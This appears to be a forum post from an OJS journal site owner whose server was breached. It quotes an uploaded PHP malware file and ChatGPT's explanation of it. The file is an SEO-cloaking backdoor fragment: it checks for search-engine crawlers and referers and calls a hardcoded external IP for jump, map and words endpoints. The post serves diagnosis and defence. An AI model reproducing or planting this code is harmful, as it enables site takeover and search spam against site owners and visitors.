Did you face a similar issue? What are the options?
A hacker removed all the files and subfolders from my public folder.
Because I suspect he/she register as an author through OJS I have now selected the option that only the journal manager can subscribe new authors
He/she apparently managed (? through OJS) to upload a php file into my public folder and take the lead.
I have asked ChatGPT
What’s the code in the following file doing in my home directory? "<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); ob_start(); // Mulai output buffering $inter_domain = 'http://192.187.108.42/z1007_7/'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Meningkatkan waktu timeout cURL menjadi 30 detik $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Meningkatkan waktu timeout menjadi 30 detik curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { $agent_check = false; $bots = 'googlebot|google|yahoo|bing|aol'; if ($agent != '') { if (preg_match("/($bots)/si", $agent)) { $agent_check = true; } } return $agent_check; } function check_refer($refer) { $check_refer = false; $referbots = 'google.co.jp|yahoo.co.jp|google.com'; if ($refer != '' && preg_match("/($referbots)/si", $refer)) { $check_refer = true; } return $check_refer; } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ob_end_flush(); // Akhiri output buffering dan kirim ke browser ?>
ChatGPT answered :
This PHP script appears to be potentially malicious and might have been placed in your home directory as part of a security breach. Here’s what it does:
Key Observations:
- Error Reporting Enabled:
- It enables full error reporting (
ini_set('display_errors', 1);
), which is common in debugging but can expose sensitive information.
- Output Buffering (
ob_start()
):
- This can be used to manipulate or delay script execution, sometimes to avoid detection.
- External Communication via cURL:
- The script defines functions (
curl_get_contents()
andgetServerCont()
) that make HTTP requests to an external server (http://192.187.108.42/z1007_7/
). - This suggests it might be fetching or sending data to this external domain.
- Crawler Detection:
- The function
is_crawler($agent)
checks if the request comes from a search engine bot (Googlebot, Yahoo, Bing, AOL). - Possible purpose: Avoiding detection by security systems or SEO poisoning.
- Referer Validation:
- The
check_refer($refer)
function checks if the visitor comes from a search engine (e.g., Google Japan). - Possible purpose: Showing different content to real users and search engines (cloaking).
- Hardcoded External Endpoints:
- The script references multiple external PHP files hosted on
http://192.187.108.42/z1007_7/
, including:/indata.php
/map.php
/jump.php
/words.php
/robots.php
- Possible purpose: Fetching malicious commands, injecting spam links, or redirecting visitors.
Potential Risks:
- Backdoor or Malware Component:
- If this script is unauthorized, it may be part of a backdoor allowing remote attackers to control your server.
- SEO Spam or Cloaking:
- It may be injecting malicious SEO content or redirecting certain visitors (like search engine crawlers) to external sites.
- Data Exfiltration:
- The script could be stealing data from your website and sending it to the external server.
What Should You Do?
- Immediately remove this file if you didn’t place it there.
- Scan your server for other suspicious files, especially:
- Unrecognized PHP files
- Modified
.htaccess
files - Suspicious scheduled tasks (cron jobs)
- Check server logs to see how the file was placed in your directory.
- Change all passwords (FTP, database, hosting panel) in case of a breach.
- Update your server and web applications to prevent further exploitation.
Let me know if you need help identifying more suspicious files!